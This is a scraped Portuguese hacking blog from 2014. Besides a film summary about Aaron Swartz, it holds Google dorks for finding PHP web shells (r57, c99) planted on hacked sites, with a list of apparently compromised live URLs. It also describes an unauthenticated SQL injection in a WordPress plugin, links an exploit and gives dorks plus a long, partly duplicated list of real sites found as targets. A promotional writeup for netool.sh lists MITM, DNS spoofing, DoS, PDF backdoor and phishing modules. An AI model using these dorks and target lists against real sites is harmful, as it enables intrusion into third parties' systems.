http://geif.com.br/categoria/conferencia-estadual-espirita-do-parana/
http://www.rccsc.com.br/interatividade/agenda/metanoia-2014-06-20
http://www.ipb.org.br/tv/tv4-19125044997583967
http://cefort.ufam.edu.br/portal/index.php?option=com_content&task=view&id=26&Itemid=48
http://www.assisimoveisjatai.com.br/imovel/single/3
http://nucleope.com.br/lancamentos/?id=52
http://viacatarina.com.br/lojas/detalhe/74
http://acervofundiario.incra.gov.br/i3geo/testamapfile.php?map=dnpm
http://rberaldo.com.br/as-mensagens-de-erros-mais-comuns-do-php/
root@paradoxo:/home/cleiton/pentest/Scanurl#

FILME - The Internet's Own Boy:A história de Aaron Swartz

FILME - The Internet's Own Boy:A história de Aaron Swartz
A história do prodígio na programação e informação ativista Aaron Swartz. A partir da ajuda de Swartz no desenvolvimento do protocolo de internet básico RSS ao seu co-fundador do Reddit, suas impressões digitais estão por toda a internet. Mas era um trabalho inovador de Swartz em justiça social e organização política combinada com a sua abordagem agressiva para o acesso à informação que ele enredados em um pesadelo legal de dois anos. Foi uma batalha que terminou com a tomada de sua própria vida com a idade de 26. História de Aaron tocou um nervo com pessoas muito além das comunidades on-line, em que ele era uma celebridade. Este filme é uma história pessoal sobre o que perdemos quando estamos surdo sobre a tecnologia e sua relação com as nossas liberdades civis.


Swartz, que cometeu suicídio no ano passado sob a tensão de um processo criminal altamente duvidoso, tornou-se um jogador nos círculos de tecnologia em torno da idade de 13 anos. Mesmo antes disso, ele arquitetou um projeto Wikipedia-like antes de tal coisa existisse. (A professora lhe disse que a idéia era estúpido, mas ele ganhou um prêmio de prestígio.) No momento em que ele deixou a escola, ele deixou a sua marca em pelo menos três aspectos importantes de como funciona a Internet de hoje. Isso incluiu a construção da infra-estrutura para Creative Commons, o esquema alternativo por direitos autorais imaginado pelo ativista e professor de direito de Harvard Lawrence Lessig. Alguns anos mais tarde, ele ajudar a desenvolver Reddit, o lucro imensamente de sua venda para a Conde Nast e obter-se demitido porque ele odiava trabalhar em um ambiente de escritório.
Filmagem de um Aaron adolescente em grandes eventos de tecnologia mostra uma criança sendo tratado como um igual por profissionais estabelecidos; aqui, alguns recordam a sua surpresa ao saber que o colaborador que tinha conhecido apenas através da comunicação on-line era muito jovem. Não surpreendentemente, o gênio menino teve alguns problemas sociais. Irmão Noé descreve-o carinhosamente como "um imbecil", que sabia que ele era mais esperto do que os outros e não tentar escondê-lo; seus diários online reconhecer a abundância de alienação social.

[Trailer]
https://www.youtube.com/watch?v=RvsxnOg0bJY

[Mais infos]
http://www.hollywoodreporter.com/review/internets-own-boy-story-aaron-672701
#Liberdade

quarta-feira, 11 de junho de 2014

Pegando aquele shell marota com dork


PEI PEI PEI ACESSEI SUA 0xHACKINAGEM s2
R57 PEI PEI PEI ACESSEI SUA 0xHACKINAGEM s2

0xDORK[0]: intext:"r57shell" || intext:"c99 shell" & intext:"safe_mode:"  &  -github -google -assembla -forum ext:php  *2014

0xDEBUG SCANNER INURL:
DEBUG SCANNER INURL:
0xBaixar:http://pastebin.com/TzijC99y
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => safe_mode:
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=intext%3A%22r57shell%22+%7C%7C+intext%3A%22c99+shell%22+%26+intext%3A%22safe_mode%3A%22++%26++-github+-google+-assembla+-forum+ext%3Aphp++%2A2014&num=1900&btnG=Search
    [port] => 80
)

0x[ALGUNS ACHADOS]
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.rodolatina.com.br/pt/noticias_detalhe.php?idProduto=133
http://www.minmini.com/admin/admin1.php?tmp
http://saxen-paris.com/css/_boot.php/sitemap%20
http://webcache.googleusercontent.com/search?q=cache:Fk9ziSWrgA4J:http://saxen-paris.com/css/_boot.php/sitemap%2520
http://srsoverseas.com.np/index.php?page=about_nepal
http://toy.az/index.php?news=2266
http://webcache.googleusercontent.com/search?q=cache:lYdPGLDr3KIJ:http://toy.az/index.php?news%3D2266
http://maheswaribrothers.com/r2.php?delete

http://jacobthomson.com/phpBB2/index.php
http://saxen-paris.com/css/_boot.php
http://www.minmini.com/admin/admin1.php?tmp
http://revistatucan.com/wp-content/themes/premiumnews/cache/external_b85021247782c61723a5a698c61eff52.php
http://www.chelovek-prazdnik.com/block/gallery/big/1553.php?delete
http://www.m-funtime.com/vb/faq.php?service
http://www.campaniameteo.it/immagini/immagini_articoli/r57.php

terça-feira, 10 de junho de 2014

Exploit Participants Database <= 1.5.4.8 Wordpress

0xParticipants Database
Wordpress Participants Database 1.5.4.8 - SQL Injection

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas.

É um plugin Wordpress populares que oferece a funcionalidade necessária para construir e manter um banco de dados de pessoas. 
Participants Database Wordpress Participants Database 1.5.4.8 - SQL Injection

- Detalhes sobre a Vulnerabilidade 

1.Devido ao privilégio insuficiente verifica que é possível para anonymous(unauthenticated) para desencadear algumas ações administrativas, se algum dos códigos de acesso é utilizado (por exemplo, inscrição de página).

2. A ação "export CSV" tem um parâmetro chamado "query" que pode conter uma consulta SQL arbitrária. 
Isso significa que um usuário não autenticado pode executar instruções SQL arbitrários (por exemplo, criar um usuário administrador, ler ou escrever arquivos ou executar código dependendo dos privilégios de usuário do MySQL).  

----------------------------------------------------------------------------------------------------------------------------------
0xEXPLOIT:
http://www.exploit-db.com/exploits/33613/


0xDORK[0]:"Index of" "/wp-content/uploads/participants-database"
0xDORK[1]:inurl:"pdb-signup/" "PDB signup"
0xDORK[2]:inurl:"pdb-signup/" intitle:"PDB signup "
----------------------------------------------------------------------------------------------------------------------------------
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => %22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22
    [arquivo] => resultados.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => Index of /wp-content/uploads/participants-database
    [cmd] => ping -c 1 _ALVO_
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=%22Index+of%22+%22%2Fwp-content%2Fuploads%2Fparticipants-database%22&num=1900&btnG=Search
    [port] => 80
)






RESULTADO PARCIAL:


http://webcache.googleusercontent.com/search?q=cache:kUL3synKmD0J:http://ebookily.org/xls/gassendi%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:WuVzKwF26PUJ:http://ebookily.org/xls/kathak-dress%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:OZ9vR__pkOgJ:http://www.tag.ubc.ca/iswnetwork.ca/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:MS8BxtAMxoAJ:http://www.shreeyashmatrimonial.com/kiran/d/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:l8rmzvOyZOkJ:http://www.younguttarakhand.org/wp/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:t43d046zpLQJ:http://partycrewgh.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:3kQuvZzwr6EJ:http://top3crew.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:gpBnRGnjbxcJ:http://sdara.com/sdarawebsite/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nHBeHM57ojEJ:http://qsaudi.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:8yfwjuM8apgJ:http://www.blc-denver2.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:1uEWo4ctyKYJ:http://www.csa.us/www/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:G64f413f7V4J:http://www.gcm73.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:vSoBRrZja70J:http://www.powercollaborative.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:VyTtsWKYn2gJ:http://cccc-houston.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:BAh_697eT80J:http://www.mjbandofgold.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:Luc-zFtM2nEJ:http://www.gapfootball.org.au/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:R6DbMAITjosJ:http://www.4k-nn.ru/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
 http://webcache.googleusercontent.com/search?q=cache:1ZHqjROYqJ8J:http://www.bcscpa.com/bcs-blog/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:-4lNmZAQJTYJ:http://graceland4kids.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

http://webcache.googleusercontent.com/search?q=cache:seg55mSkGSoJ:http://emeraldtigers.com.au/new_2013_website/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:nR8gLIEbCOEJ:http://artisanwineclub.com/index/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:cn3Yz66lQ-AJ:http://www.dsnyfamily.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:7W_fZ-33EVQJ:http://promovgroup.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://webcache.googleusercontent.com/search?q=cache:KT4lO7pNnswJ:http://www.rebbepiper.com/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk

 http://webcache.googleusercontent.com/search?q=cache:oujptjZTnnMJ:http://www.firt2013barcelona.org/wp-content/uploads/participants-database/%2B%22Index+of%22+%22/wp-content/uploads/participants-database%22&num=1900&hl=pt-BR&&ct=clnk
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saror
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saroregon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/egon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/

netool.sh V3.4 [ r00tsect0r module ]

netool.sh V3.4 
netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são: recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também veio com [root3.rb] meterpreter ruby ​​script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador, directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de (Metasploit) exploits automatizados ...

netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são:
recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também
veio com [root3.rb] meterpreter ruby ​​script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador,
directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de
(Metasploit) exploits automatizados ...

Dependências
  1. Nmap
  2. Ettercap
  3. Macchanger
  4. Metasploit
  5. Driftnet
  6. Apache2
  7. Sslstrip
  8. Python-beautifulsoup

Neste vídeo tutorial, vamos ver o funcionamento acompanhamento módulos:
  1. Backdoor PDF (Adobe Reader no Windows XP SP3)
  2. FakeUpdate (windows universal)
  3. java.jar phishing (OSX maçã, Linux, Windows, BSD, Solaris com java em execução)
  4. java_applet attacj "clonar um site e injetar um Iframe que aponta para a nossa aplicação" (sistemas afetados são: Apple OSX, Linux, Windows, BSD, Solaris)
  5. Ataque RDP D0S (denial-of-service Agains um host de destino em execução RDP proto)
ChangeLog:
----------------------------------------­---------------------------------------------------------------­-----------------------
Interface de usuário renovada
'clear script output'
'linux hashdump.rb added'
'PDF backdoor added'

Phishing modules improved
'External IP addr display'
'post-exploitation modules added'
----------------------------------------­---------------------------------------------------------------­-----------------------



Página do projeto
http://sourceforge.net/projects/netoolsh/?source=directory

WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/